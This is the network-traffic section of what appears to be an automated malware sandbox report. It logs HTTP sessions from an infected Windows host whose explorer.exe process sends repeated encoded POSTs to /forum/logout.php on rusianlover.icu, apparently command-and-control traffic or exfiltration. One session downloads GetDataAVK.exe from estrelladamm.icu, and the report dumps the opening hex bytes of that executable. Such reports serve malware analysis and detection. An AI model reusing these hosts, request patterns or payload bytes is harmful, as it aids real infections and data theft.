                                        Data Raw: 74 73 72 6b 6a 69 68 61 7a 3d 31 36 35 34 36 33 36 31 26 76 77 78 73 74 3d 45 31 34 35 35 41 32 33 39 37 37 42 37 38 35 41 31 35 41 35 36 44 37 44 35 35 41 34 33 46 26 78 61 64 61 64 67 6a 3d 41 30 42 45 35 34 36 46 31 33 46 43 45 46 46 37 39 38 38 30 38 46 44 37 37 43 35 33 45 34 37 37 30 30 46 42 32 30 43 36 32 34 39 37 35 31 32 31 32 33 34 33 39 33 32 34 39 31 39 39 30 43 41 43 31 44 33 36 42 45 36 39 37 38 35 42 32 36 44 33 41 34 36 41 43 41 31 30 44 36 31 42 37 35 32 44 41 34 45 33 38 37 34 43 46 34 39 33 35 45 32 39 41 31 37 33 30 42 41 31 33 39 37 33 38 41 33 33 43 31 38 30 41 36 34 37 45 39 31 42 33 39 37 38 30 38 39 41 41 44 46 43 42 38 35 35 42 39 41 36 46 37 37 39 35 42 30 37 39 45 36 45 33 38 37 38 38 36 37 43 31 45 30 33 44 30 32 45 30 39 39 35 44 38 44 36 36 35 33 33 36 45 33 41 43 38 36 35 35 43 36 36 44 46 38 43 45 42 41 34 45 33 41 36 35 39 30 44 43 34 42 43 34 36 39 43 36 31 45 37 30 42 42 36 44 42 42 33 43 31 30 41 34 31 46 44 39 31 46 45 34 31 37 45 46 39 41 41 35 46 39 33 30 31 33 39 34 44 32 45 39 46 44 34 43 41 45 34 32 32 39 32 30 32 39 44 38 41 33 45 31 33 33 32 45 36 37 39 46 38 43 45 38 45 36 39 35 30 46 31 31 41 30 33 37 31 38 42 38 37 44 33 38 46 45 41 42 46 46 34 35 43 39 44 37 30 36 30 32 31 33 33 39 44 41 31 44 41 34 34 44 33 31 34 42 43 39 46 41 33 44 35 41 46 39 33 39 42 37 41 30 30 30 42 34 39 39 31 38 34 43 35 33 30 31 31 37 46 31 31 45 33 43 35 44 33 41 46 38 38 37 35 35 31 41 42 41 45 46 33 42 33 39 31 46 32 41 34 36 34 36 42 42 46 32 35 46 30 30 42 31 36 42 32 44 36 35 34 34 45 31 30 33 33 31 30 32 41 35 46 38 45 38 42 45 35 38 35 41 44 39 30 34 30 43 41 33 46 46 33 37 41 41 39 41 33 32 34 38 31 41 34 30 41 36 46 34 34 45 34 39 46 31 33 39 37 46 39 43 32 45 39 33 30 34 30 45 33 45 33 34 30 39 41 38 42 41 44 46 39 38 32 46 34 45 41 41 36 30 32 35 41 46 39 46 36 34 36 38 38 45 34 38 35 44 42 45 37 37 43 42 46 46 44 30 31 35 43 43 34 35 32 33 35 44 43 44 35 38 33 30 38 34 34
                                        Data Ascii: tsrkjihaz=16546361&vwxst=E1455A23977B785A15A56D7D55A43F&xadadgj
                                        Mar 10, 2021 11:43:43.760396957 CET  10182               IN         HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:50 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 0a af b5 05 77 c9 fa 6b a3 43 38 53 78 ea f3 cb 6a 0c 45 93 99 5d 58 bf 46 91 13 02 31 76 13 a1 9d 1f 44 2a 93 34 ad 15 23 32 eb 0b 55 20 06 3c d7 a3 6b e3 4a 17 66 02 47 dd 28 fb d9 a2 8d bf 65 f7 98 66 ca 90 23 5f fb eb 0b 6b 84 68 61 df 10 44 58 b0 54 07 7a d8 9b 97 c1 0e 93 07 3d 7b 57 85 24 12 96 66 78 b6 b1 ed b6 75 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dwkC8SxjE]XF1vD*4#2U <kJfG(ef#_khaDXTz={W$fxu0


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        28          192.168.2.5  49761        212.114.52.43   80                C:\Windows\SysWOW64\explorer.exe
                                        Timestamp                            kBytes transferred  Direction  Data
                                        Mar 10, 2021 11:43:46.563150883 CET  10184               OUT        POST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 644
                                        Cache-Control: no-cache
                                        Data Raw: 7a 79 64 63 68 67 66 3d 36 65 64 38 64 39 33 32 37 37 36 30 35 30 32 61 31 31 61 31 33 31 35 61 32 63 26 78 75 78 75 78 3d 34 30 36 35 38 35 34 35 26 62 63 6a 6b 72 73 74 61 62 3d 33 46 36 37 44 37 43 43 38 35 36 36 39 35 42 39 41 32 42 44 31 32 30 44 34 44 31 37 46 38 39 32 30 42 36 30 36 43 34 38 43 32 34 34 46 33 30 36 34 43 31 35 35 38 39 36 39 31 41 42 36 34 31 38 45 37 32 32 41 35 30 33 41 37 34 45 35 30 43 35 44 34 30 43 44 36 34 36 46 33 32 32 36 32 35 34 38 37 32 46 36 33 35 34 32 30 37 41 31 30 42 42 35 46 33 33 44 33 39 45 44 36 42 46 35 43 41 45 33 39 42 32 39 31 35 41 34 37 34 36 38 33 42 36 44 38 42 39 32 35 30 35 39 30 33 30 37 37 42 43 42 31 39 38 44 45 32 46 39 44 41 38 45 32 43 44 42 35 39 31 44 30 33 38 31 44 30 38 36 38 33 41 44 33 41 42 33 46 46 30 30 39 37 31 33 46 35 46 31 36 44 42 44 45 44 37 33 39 46 39 43 30 30 38 30 31 45 39 30 44 34 42 34 33 42 39 43 41 45 42 45 44 43 32 42 31 41 35 33 42 31 34 34 46 42 44 43 43 37 31 33 46 32 30 38 37 34 41 33 46 35 36 42 33 30 43 37 35 34 30 39 39 44 39 36 39 32 46 45 39 35 44 32 37 37 31 30 41 39 35 38 42 41 42 42 37 36 34 44 32 39 45 37 43 46 43 44 32 39 37 35 33 32 33 36 44 31 42 35 30 45 34 44 31 42 34 38 33 45 35 46 30 45 36 36 37 35 37 34 32 30 32 44 31 32 34 38 46 32 35 46 43 34 30 38 39 33 37 33 41 32 37 35 30 30 32 41 32 44 35 42 37 44 32 36 31 38 45 43 43 45 34 44 36 35 41 46 31 38 42 30 41 44 31 39 43 32 35 46 39 45 33 30 31 32 43 46 46 42 30 30 44 31 38 34 38 30 36 46 41 41 34 34 41 30 32 37 44 46 45 44 44 32 38 31 33 35 31 46 35 41 31 38 43 33 37 38 39 39 35 32 34 36 31 35 43 31 36 37 43 32 43 44 31 43 33 33 33 43 38 39 31 39 46 30 35 30 43 36 44 45 38 44 34 41 46 34 30 35 41 33 41 45 35 45 42 41 44 31 39 31 35 43 44 35 45 45 44 30 42 35 41 46 46 44 36 41 34 33 36 38 37 36 32 35 30 38 46 33 31 45 34 46 43 30 43 46 36 42 38 41 30 38 32 38 33 34 36 44 44 39 46 34 33 34 43 30 36 41 33 39 32 33 37 44 35 43 35 45 31 46 45 31 34
                                        Data Ascii: zydchgf=6ed8d9327760502a11a1315a2c&xuxux=40658545&bcjkrstab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
                                        Mar 10, 2021 11:43:46.642538071 CET | 10184 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:52 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a d4 0a 84 32 d2 78 15 76 87 21 ca ba 2c 1b fb 49 e4 0c 49 5a f3 a6 e9 21 54 97 99 d7 15 77 d4 c3 63 a7 ba f7 95 be 11 01 c0 cc 12 bd 6e 97 63 52 94 15 1c fe 16 f9 43 d6 e9 d9 7c 50 0d 1b e1 86 eb 76 55 7a 89 80 c5 d6 7b 94 15 b4 03 d4 47 3e 19 4f d4 d4 8b 36 06 e9 ab 1b cf eb 74 46 a0 ad a6 29 14 55 c9 af e7 58 4e 09 f7 a5 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6d2xv!,IIZ!TwcncRC|PvUz{G>O6tF)UXN0


                                        Session ID: 29 | Source: 192.168.2.5:49762 | Destination: 212.114.52.43:80 | Process: C:\Windows\SysWOW64\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Mar 10, 2021 11:43:49.404409885 CET | 10186 | OUT | POST /forum/logout.php?id=9557666 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 672
                                        Cache-Control: no-cache
                                        Data Raw: 66 71 62 67 72 3d 41 30 44 36 39 39 38 35 42 44 30 44 39 45 36 44 32 32 43 45 32 43 35 42 46 39 34 42 46 46 41 31 45 36 36 37 46 33 37 46 34 44 37 37 34 41 38 46 38 36 44 35 43 46 26 64 6d 76 79 68 71 7a 63 6c 3d 32 30 30 30 32 34 37 35 26 68 75 68 6f 62 6f 62 3d 62 62 65 37 65 39 66 65 35 38 39 31 30 35 33 30 32 62 34 63 31 39 38 33 33 37 64 37 65 30 64 31 37 63 34 38 39 31 62 34 37 64 61 30 32 38 37 61 30 35 35 38 30 39 35 65 30 38 64 62 65 36 32 36 65 66 31 35 33 37 39 62 39 35 36 30 62 38 32 37 34 30 65 38 39 33 66 31 66 35 66 63 61 39 65 30 64 34 65 64 30 63 62 33 33 31 61 61 62 61 38 37 66 31 63 65 66 35 34 34 64 66 64 32 61 31 62 35 39 61 36 39 63 62 66 61 35 38 39 32 31 33 61 31 31 63 36 31 39 38 36 65 39 34 31 34 32 31 35 33 63 63 39 39 66 63 61 35 64 62 34 34 61 66 34 38 61 65 66 37 65 30 65 30 36 65 34 34 34 37 61 33 33 31 61 37 62 32 30 33 61 38 62 32 33 61 66 35 37 61 35 62 38 38 34 31 62 32 64 63 62 38 37 31 64 37 37 64 65 61 33 61 65 39 34 34 65 66 66 65 39 64 33 32 39 31 32 32 35 63 32 34 39 32 38 35 61 61 33 31 66 62 35 39 66 39 63 39 36 33 36 37 36 37 39 36 33 37 64 65 34 62 39 66 66 30 63 62 34 37 35 66 33 62 35 64 37 36 65 37 61 35 66 31 34 35 64 36 31 30 64 61 61 63 61 35 38 63 37 32 31 36 32 32 33 61 34 64 35 35 64 36 61 36 36 32 38 38 63 34 35 31 61 61 39 37 39 62 37 65 36 61 36 32 36 35 34 39 64 64 31 65 63 62 37 32 34 65 36 62 66 33 66 31 63 31 32 61 38 62 38 34 64 32 66 32 39 62 31 32 31 35 35 61 30 62 38 33 31 32 37 32 31 63 61 61 39 35 37 36 30 66 36 61 32 33 32 61 32 32 30 32 33 37 36 62 63 37 63 65 33 64 66 63 61 63 32 33 64 64 62 35 35 31 62 33 66 33 34 31 64 30 30 66 33 30 65 66 66 65 39 62 36 36 61 35 61 66 31 33 38 35 37 64 65 33 62 37 39 61 37 37 34 30 32 63 34 38 66 35 65 63 35 61 31 61 31 30 31 63 37 32 39 63 61 63 39 30 61 33 34 36 38 30 34 39 63 61 64 39 35 65 38 35 38 37 35 32 33 32 65 64 34 35 34 35 33 32 65 32 31 30 36 33 65 31 66 64 34 32 33 63 66 33 36 32 39 33 35 39 64 30 
65 38 65 65 37 32 66 35 31 32 38 62 65 37 34 61 63 33 62 39 35 35
                                        Data Ascii: fqbgr=A0D69985BD0D9E6D22CE2C5BF94BFFA1E667F37F4D774A8F86D5CF&dmvyhqzcl=20002475&huhobob=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
                                        Mar 10, 2021 11:43:49.483335018 CET | 10186 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:55 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 41 8f 16 19 82 1b 9c 41 c6 5a af 02 7f 6d 7d 8a 98 f5 1d 9d d9 66 7f ad 12 07 38 99 6b af dd eb aa 3c ca 8c de c9 be 7f 9c 78 b1 41 5d 97 a5 36 f3 99 bf 99 0f b8 a9 d7 f0 1d ce ea a5 2d b9 13 9e a6 07 91 4c de 6c 18 80 87 81 aa 27 5f ab d8 33 b3 b7 04 9d 8b ea 6d f7 99 9c 45 70 a7 22 0b 79 cd 04 45 48 30 90 83 c6 92 b8 8f 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dAAZm}f8k<xA]6-Ll'_3mEp"yEH00


                                        Session ID: 3 | Source: 192.168.2.5:49719 | Destination: 8.210.47.214:80 | Process: C:\Windows\SysWOW64\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Mar 10, 2021 11:42:34.206296921 CET | 1224 | OUT | GET /old/GetDataAVK.exe HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: estrelladamm.icu
                                        Cache-Control: no-cache
                                        Mar 10, 2021 11:42:34.481314898 CET | 1226 | IN | HTTP/1.1 200 OK
                                        Date: Wed, 10 Mar 2021 10:42:34 GMT
                                        Server: Apache
                                        Last-Modified: Wed, 10 Mar 2021 05:36:15 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 680448
                                        Content-Type: application/x-msdownload
                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee 58 48 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 58 0a 00 00 08 00 00 00 00 00 00 ce 76 0a 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0a 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 76 0a 00 57 00 00 00 00 80 0a 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0a 00 0c 00 00 00 c4 75 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 56 0a 00 00 20 00 00 00 58 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 80 0a 00 00 06 00 00 00 5a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0a 00 00 02 00 00 00 60 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 76 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 18 a4 09 00 ac d1 00 00 03 00 00 00 c1 01 00 06 a8 95 00 00 70 0e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 e1 01 00 06 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 4a 02 04 28 03 00 00 0a 00 00 02 03 28 03 00 00 06 00 2a 00 13 30 02 00 0d 00 00 00 01 00 00 11 00 02 
03 73 04 00 00 06 0a 2b 00 06 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 36 02 03 04 14 14 28 09 00 00 06 00 00 2a 13 30 04 00 4c 00 00 00 02 00 00 11 73 0d 00 00 06 0a 06 0e 04 7d 03 00 00 04 02 03 04 28 04 00 00 06 00 00 05 2c 0b 06 7b 03 00 00 04 14 fe 03 2b 01 16 0b 07 2c 20 00 02 05 6f 95 00 00 06 06 fe 06 0e 00 00 06 73 04 00 00 0a 28 01 00 00 2b 28 07 00 00 06 00 00 2a 13 30 02 00 0d 00 00 00 03 00 00 11 00 02 03 73 08 00 00 06 0a 2b 00 06 2a 00 00 00 13 30 04 00 0f 00 00 00 03 00 00 11 00 02 03 04 05 73 09 00 00 06 0a 2b 00 06 2a 00 13 30 04 00 19 00 00 00 03 00 00 11 00 02 6f 02 00 00 06 02 6f 06 00 00 0a 03 04 73 09 00 00 06 0a 2b 00 06 2a 22 02 28 07 00 00 0a 00 2a 6e 03 6f b5 00 00 06 2d 11 03 02 7b 03 00 00 04 6f bb 00 00 06 14 fe 01 2b 01 16 2a 1e 02 7b 1e 00 00 04 2a 22 02 03 7d 1e 00 00 04 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 20 00 00 04 2a 1e 02 7b 21 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 22 00 00 04 2a 22 02 03 7d 22 00 00 04 2a 1e 02 7b 23 00 00 04 2a 22 02 03 7d 23 00 00 04 2a 32 02 03 1c 04 28 1a 00 00 06 00 00 2a 13 30 04 00 c2 00 00 00 04 00 00 11 02 14 7d 18 00 00 04 02 14 7d 19 00 00 04 02 16 6a 7d 1b 00 00 04 02 16 7d 1c 00 00 04 02 73 09 00 00 0a 7d 1d 00 00 04 02 28 07 00 00 0a 00 00 03 28 0a 00 00 0a 0d 09 2c 10 72 01 00 00 70 72 25 00 00 70 73 0b 00 00 0a 7a 02 03 28 12 00 00 06 00 02 28 11 00 00 06 28 1d 00 00 06 0b 07 12 00 04 7e 0c 00 00 0a 28 2e 01 00 06 0c 02 06 28 10 00
                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELXH`0Xv @ @tvWu H.textV X `.rsrcZ@@.reloc`@BvHp(*{*"}*J((*0s+*{*"}*6(*0Ls}(,{+, os(+(*0s+*0s+*0oos+*"(*no-{o+*{*"}*{ *"} *{!*"}!*{"*"}"*{#*"}#*2(*0}}j}}s}((,rpr%psz(((~(.(


                                        Session ID: 30 | Source: 192.168.2.5:49763 | Destination: 212.114.52.43:80 | Process: C:\Windows\SysWOW64\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Mar 10, 2021 11:43:52.245745897 CET | 10188 | OUT | POST /forum/logout.php?id=2442663 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 659
                                        Cache-Control: no-cache
                                        Data Raw: 6d 79 6b 77 69 75 67 73 3d 37 34 38 34 37 38 36 36 38 64 34 35 66 66 39 37 38 38 38 38 66 61 61 30 38 34 34 62 63 34 39 65 34 34 62 38 63 38 30 35 64 39 32 63 26 6b 75 65 6f 79 69 3d 31 35 32 36 34 30 36 32 26 6f 63 71 65 3d 33 64 36 34 36 38 34 62 35 66 65 34 66 66 65 65 31 64 61 61 62 36 63 33 63 36 66 39 37 35 65 37 32 61 36 32 31 39 36 34 39 63 34 35 66 33 61 39 39 34 32 63 37 39 34 64 32 32 63 63 35 36 65 33 36 66 61 34 33 61 65 33 32 63 37 36 39 61 32 31 37 39 63 35 33 37 61 31 39 63 63 36 38 62 34 33 64 31 64 38 30 64 63 34 38 33 33 61 65 33 62 32 31 39 39 30 34 39 66 39 31 62 38 66 38 35 65 35 62 35 39 30 34 31 31 63 39 31 62 63 61 62 39 64 38 34 30 63 37 31 34 36 37 66 35 65 66 31 30 39 38 33 39 30 31 33 35 61 63 62 36 31 66 37 31 66 61 36 39 32 62 62 36 37 63 38 62 62 66 33 63 63 37 32 63 37 65 38 37 66 61 64 39 64 36 35 65 34 35 39 36 66 62 63 37 62 38 64 38 37 32 63 66 38 30 63 66 66 63 38 31 65 36 32 65 65 35 35 35 33 66 37 37 61 38 61 62 32 32 33 31 63 35 39 64 37 35 38 39 35 62 31 36 61 31 65 31 64 34 34 38 31 37 36 31 65 63 64 34 35 34 39 37 31 37 61 64 34 62 39 61 36 36 65 31 65 31 37 64 61 30 62 30 65 65 30 37 34 30 65 33 61 38 38 65 30 33 34 32 31 30 61 63 62 30 64 31 33 64 30 36 35 62 62 61 39 35 37 65 37 39 66 37 34 61 63 62 35 38 37 63 63 37 33 32 32 66 65 36 62 62 30 36 33 31 34 38 32 61 32 39 61 34 34 36 61 34 36 65 31 33 64 32 61 66 30 61 38 32 64 31 32 39 63 31 66 35 64 31 34 32 62 61 61 64 38 38 64 31 30 34 65 66 66 66 34 39 35 65 39 39 65 62 38 33 65 39 33 61 35 37 31 31 61 34 38 65 38 65 62 38 65 66 36 34 35 66 65 37 34 63 37 36 30 36 65 31 61 34 65 34 36 35 35 37 36 63 31 37 32 36 30 35 63 31 31 35 62 38 34 62 39 66 65 39 34 63 64 35 32 65 33 64 33 31 63 36 34 36 36 64 33 64 63 39 30 38 30 36 33 38 66 66 62 30 33 66 30 33 66 66 63 64 66 33 65 37 35 62 35 65 62 30 62 30 30 30 32 37 64 63 30 39 32 34 39 33 65 63 62 66 65 39 61 65 34 62 62 39 37 37 38 64 35 32 35 30 61 61 66 63 36 30 37 39 
35 66 31 31 30 31 30 32 39
                                        Data Ascii: mykwiugs=748478668d45ff978888faa0844bc49e44b8c805d92c&kueoyi=15264062&ocqe=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
                                        Mar 10, 2021 11:43:52.322666883 CET | 10188 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:58 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a db ab 96 43 cd 27 ee 46 10 6a 6a 71 83 d9 64 74 63 ac f3 7d 87 d6 d0 58 3e c4 87 63 47 73 47 91 70 46 6f e7 ae d5 41 d5 93 f3 67 9f a2 28 5f 72 88 f0 b8 3f f0 ed ef 44 03 a7 9d d6 28 23 b2 9d 8a 75 14 02 1d cf 2a 7c 9d d8 df f7 39 8d 1c fe ca ef 09 c5 61 3d 24 d4 ff a4 7a 98 f2 e8 25 2d f2 39 39 5c eb fa f8 85 ce 00 d3 5f 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dC'Fjjqdtc}X>cGsGpFoAg(_r?D(#u*|9a=$z%-99\_0


                                        Session ID: 31 | Source: 192.168.2.5:49764 | Destination: 212.114.52.43:80 | Process: C:\Windows\SysWOW64\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Mar 10, 2021 11:43:55.078284025 CET | 10190 | OUT | POST /forum/logout.php?id=7086675 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 633
                                        Cache-Control: no-cache
                                        Data Raw: 69 77 65 73 67 6f 63 71 3d 38 35 32 38 31 39 33 34 26 6b 61 6b 61 3d 37 33 65 62 32 63 64 65 62 62 63 63 33 36 62 62 30 37 26 6d 65 71 69 61 6d 3d 33 33 31 65 33 65 30 33 37 39 32 35 35 34 31 31 65 31 35 66 66 37 32 30 36 63 66 30 31 37 32 65 39 36 33 39 36 32 37 30 32 35 35 38 36 39 39 34 35 38 33 36 35 31 61 31 30 36 64 31 66 37 61 65 63 38 63 32 61 37 63 34 63 30 38 38 34 35 61 35 37 38 38 33 65 34 31 30 30 32 66 65 61 31 34 35 31 62 36 35 31 62 36 35 31 31 63 35 33 65 66 34 63 61 61 62 33 65 35 33 35 62 34 32 66 31 38 63 37 31 33 65 64 63 36 63 66 62 63 37 64 66 34 65 65 34 64 34 64 34 30 31 64 37 30 35 30 32 31 62 30 61 30 66 31 36 34 66 32 32 62 63 37 35 62 31 37 34 36 64 30 35 35 66 61 63 30 61 38 61 65 61 38 39 63 64 36 36 63 64 36 66 33 32 63 37 38 31 65 65 30 61 34 37 64 36 33 31 65 65 36 35 65 33 64 30 64 39 33 64 31 38 33 30 64 32 61 61 35 34 34 63 61 31 62 64 38 64 64 38 65 63 31 35 34 62 66 36 33 31 63 34 33 32 61 35 34 34 33 30 39 31 35 31 38 35 39 35 64 62 30 30 38 61 38 33 61 64 36 63 63 37 61 61 32 38 31 34 65 64 63 62 32 37 39 36 30 62 61 33 31 36 63 37 63 31 35 36 34 36 39 38 63 63 64 66 63 32 38 37 35 31 35 38 65 64 30 36 66 61 37 39 61 63 37 35 30 66 38 38 32 38 66 32 33 31 66 33 66 35 31 33 64 37 64 33 38 34 35 39 36 35 34 32 65 37 64 65 33 65 61 62 66 61 62 65 66 63 30 38 33 61 35 63 61 39 66 30 35 36 30 33 35 36 63 61 33 61 61 32 32 39 66 30 33 65 31 30 37 32 34 37 34 61 37 61 33 64 61 39 39 37 64 31 63 66 66 62 64 31 35 34 62 39 63 31 38 39 30 35 64 31 37 63 62 36 30 65 64 35 35 39 33 30 34 64 34 38 38 30 32 37 35 63 34 36 31 33 36 37 38 64 34 39 34 61 61 61 38 32 37 65 62 31 63 35 66 31 33 34 62 36 38 32 38 35 61 61 61 63 36 35 31 37 38 64 39 36 62 63 64 35 39 36 61 38 32 34 31 62 38 32 62 36 36 36 36 33 61 35 33 39 30 66 31 37 32 65 32 62 34 32 38 64 30 61 65 39 35 36 35 38 32 30 63 33 64 37 34 64 32 38 63 37 30 38 63 36 63 39 34 66 61 31
                                        Data Ascii: iwesgocq=85281934&kaka=73eb2cdebbcc36bb07&meqiam=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
                                        Mar 10, 2021 11:43:55.147188902 CET | 10190 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:44:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 00 c5 07 3a 89 25 cb 45 b1 4c 07 c5 58 18 be 27 15 c8 3b 5f 14 d6 97 2e 84 39 ed 0e 16 6e a2 9d 8d b1 a5 71 40 3a 33 3b 55 87 83 c9 d4 5a 95 c3 37 d0 3b 03 22 60 e0 c3 46 6b 71 00 6d 11 a3 71 48 f1 d3 be 7b 2f ce 5f ad 3a b0 e2 d5 f1 a0 54 84 7c 8a bc 14 0d 60 b3 2f 20 09 f7 44 8d 4e 98 17 3a 37 4a b4 3b be 17 b0 37 d5 01 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6d:%ELX';_.9nq@:3;UZ7;"`FkqmqH{/_:T|`/ DN:7J;70


                                        Session ID: 4 | Source: 192.168.2.5:49720 | Destination: 212.114.52.43:80 | Process: C:\Windows\SysWOW64\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Mar 10, 2021 11:42:36.555608034 CET | 1938 | OUT | POST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 633
                                        Cache-Control: no-cache
                                        Data Raw: 6c 63 6e 65 70 67 78 69 7a 3d 35 36 30 37 35 32 31 26 6e 67 74 6d 7a 3d 37 61 39 31 62 31 65 34 30 65 30 35 65 37 34 30 26 70 6b 7a 75 6a 65 7a 3d 30 39 39 46 35 36 30 44 33 35 41 43 34 38 44 46 34 46 36 42 39 44 46 38 44 38 45 45 33 44 30 38 45 42 41 44 45 34 41 36 42 45 41 45 37 32 32 38 39 37 37 32 30 45 33 43 30 38 46 31 36 34 31 38 37 43 42 38 44 34 39 35 42 34 43 31 32 34 32 34 35 37 30 45 34 33 43 45 34 38 36 36 31 42 45 38 30 39 39 37 46 30 42 46 31 31 32 32 32 32 41 32 41 45 32 36 30 36 42 42 34 39 44 31 36 44 35 32 38 41 34 42 35 45 30 37 36 37 33 43 44 33 34 43 37 32 42 43 37 45 33 30 46 39 33 34 39 44 35 36 32 42 42 41 35 36 41 30 45 34 45 35 35 32 42 44 35 37 39 41 46 45 30 30 37 46 33 39 45 34 45 46 34 39 39 45 34 42 41 41 30 41 46 39 44 33 33 37 45 35 34 41 32 46 41 44 34 33 38 35 30 33 31 39 42 46 34 31 44 42 33 37 32 34 37 45 46 38 41 32 35 36 34 41 36 41 34 32 42 46 38 38 39 32 44 34 33 42 33 41 41 30 30 32 32 37 44 43 41 30 42 35 42 46 30 42 39 39 35 39 34 46 46 46 41 37 34 44 34 43 39 38 34 38 45 36 33 41 36 39 45 46 46 33 39 32 46 44 42 43 31 39 38 33 45 39 31 30 30 46 39 33 46 35 36 44 37 37 35 30 38 33 41 32 36 39 44 44 39 43 46 33 36 44 44 44 33 38 36 42 30 36 46 34 45 37 37 38 39 39 37 34 45 30 32 31 30 45 43 38 36 32 44 36 37 45 33 31 30 44 36 42 46 46 32 43 36 39 38 43 46 39 36 41 46 32 45 32 32 41 36 46 35 42 31 37 30 36 39 41 39 30 35 44 43 34 37 41 38 45 36 39 34 42 45 41 46 37 31 35 38 45 35 32 45 32 37 44 37 30 41 41 41 38 42 37 41 31 46 42 32 44 39 46 43 38 45 37 46 35 44 43 32 42 31 33 45 36 41 39 33 45 33 39 36 45 37 42 42 35 43 37 44 45 38 38 39 38 